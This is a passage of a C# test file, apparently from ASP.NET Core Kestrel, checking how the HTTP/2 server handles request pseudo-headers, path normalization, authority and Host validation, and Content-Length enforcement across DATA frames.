withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("Custom", _decodedHeaders["Method"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_CONNECTMethod_Accepted()
{
await InitializeConnectionAsync(_echoMethod);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "CONNECT") };
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 71,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("CONNECT", _decodedHeaders["Method"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_OPTIONSStar_LeftOutOfPath()
{
await InitializeConnectionAsync(_echoPath);
            // :authority is optional; for OPTIONS *, :path is sent as "*" and is left out of Request.Path
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "OPTIONS"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, "*")};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 75,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(5, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("", _decodedHeaders["path"]);
Assert.Equal("*", _decodedHeaders["rawtarget"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_OPTIONSSlash_Accepted()
{
await InitializeConnectionAsync(_echoPath);
            // :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "OPTIONS"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, "/")};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 76,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(5, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("/", _decodedHeaders["path"]);
Assert.Equal("/", _decodedHeaders["rawtarget"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
        public async Task HEADERS_Received_PathAndQuery_Separated()
{
await InitializeConnectionAsync(context =>
{
context.Response.Headers["path"] = context.Request.Path.Value;
context.Response.Headers["query"] = context.Request.QueryString.Value;
context.Response.Headers["rawtarget"] = context.Features.Get<IHttpRequestFeature>().RawTarget;
return Task.CompletedTask;
});
            // :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, "/a/path?a&que%35ry")};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 118,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(6, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("/a/path", _decodedHeaders["path"]);
Assert.Equal("?a&que%35ry", _decodedHeaders["query"]);
Assert.Equal("/a/path?a&que%35ry", _decodedHeaders["rawtarget"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Theory]
[InlineData("/","/")]
[InlineData("/a%5E", "/a^")]
[InlineData("/a%E2%82%AC", "/a€")]
[InlineData("/a%2Fb", "/a%2Fb")] // Forward slash, not decoded
[InlineData("/a%b", "/a%b")] // Incomplete encoding, not decoded
[InlineData("/a/b/c/../d", "/a/b/d")] // Navigation processed
[InlineData("/a/b/c/../../../../d", "/d")] // Navigation escape prevented
[InlineData("/a/b/c/.%2E/d", "/a/b/d")] // Decode before navigation processing
public async Task HEADERS_Received_Path_DecodedAndNormalized(string input, string expected)
{
await InitializeConnectionAsync(context =>
{
Assert.Equal(expected, context.Request.Path.Value);
Assert.Equal(input, context.Features.Get<IHttpRequestFeature>().RawTarget);
return Task.CompletedTask;
});
            // :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, input)};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Theory]
[InlineData(HeaderNames.Path, "/")]
[InlineData(HeaderNames.Scheme, "http")]
public async Task HEADERS_Received_CONNECTMethod_WithSchemeOrPath_Reset(string headerName, string value)
{
await InitializeConnectionAsync(_noopApplication);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "CONNECT"),
new KeyValuePair<string, string>(headerName, value) };
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2ErrorConnectMustNotSendSchemeOrPath);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_SchemeMismatch_Reset()
{
await InitializeConnectionAsync(_noopApplication);
            // :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "https") }; // Not the expected "http"
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatHttp2StreamErrorSchemeMismatch("https", "http"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_MissingAuthority_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_EmptyAuthority_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, ""),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_MissingAuthorityFallsBackToHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("abc", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_EmptyAuthorityIgnoredOverHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, ""),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("abc", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_AuthorityOverridesHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "def"),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("def", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_AuthorityOverridesInvalidHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "def"),
new KeyValuePair<string, string>("Host", "a=bc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("def", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_InvalidAuthority_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "local=host:80"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatBadRequest_InvalidHostHeader_Detail("local=host:80"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_InvalidAuthorityWithValidHost_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "d=ef"),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatBadRequest_InvalidHostHeader_Detail("d=ef"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_TwoHosts_StreamReset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("Host", "host1"),
new KeyValuePair<string, string>("Host", "host2"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatBadRequest_InvalidHostHeader_Detail("host1,host2"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task ContentLength_Received_SingleDataFrame_Verified()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_ReceivedInContinuation_SingleDataFrame_Verified()
{
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("a", _largeHeaderValue),
new KeyValuePair<string, string>("b", _largeHeaderValue),
new KeyValuePair<string, string>("c", _largeHeaderValue),
new KeyValuePair<string, string>("d", _largeHeaderValue),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Received_MultipleDataFrame_Verified()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
var total = read;
while (read > 0)
{
read = await context.Request.Body.ReadAsync(buffer, total, buffer.Length - total);
total += read;
}
Assert.Equal(12, total);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[1].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[3].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[8].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Received_NoDataFrames_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task ContentLength_ReceivedInContinuation_NoDataFrames_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("a", _largeHeaderValue),
new KeyValuePair<string, string>("b", _largeHeaderValue),
new KeyValuePair<string, string>("c", _largeHeaderValue),
new KeyValuePair<string, string>("d", _largeHeaderValue),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task ContentLength_Received_SingleDataFrameOverSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[13].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorMoreDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorMoreDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Received_SingleDataFrameUnderSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[11].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorLessDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Received_MultipleDataFramesOverSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[1].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[2].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[10].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[2].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorMoreDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorMoreDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Received_MultipleDataFramesUnderSize_Reset()
{
IOException thrownEx = null;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
thrownEx = await Assert.ThrowsAsync<IOException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[1].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[2].AsSpan(), endStream: true);
await WaitForStreamErrorAsync(1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2StreamErrorLessDataThanLength);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
var expectedError = new Http2StreamErrorException(1, CoreStrings.Http2StreamErrorLessDataThanLength, Http2ErrorCode.PROTOCOL_ERROR);
Assert.NotNull(thrownEx);
Assert.Equal(expectedError.Message, thrownEx.Message);
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
[Fact]
public async Task ContentLength_Response_FirstWriteMoreBytesWritten_Throws_Sends500()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
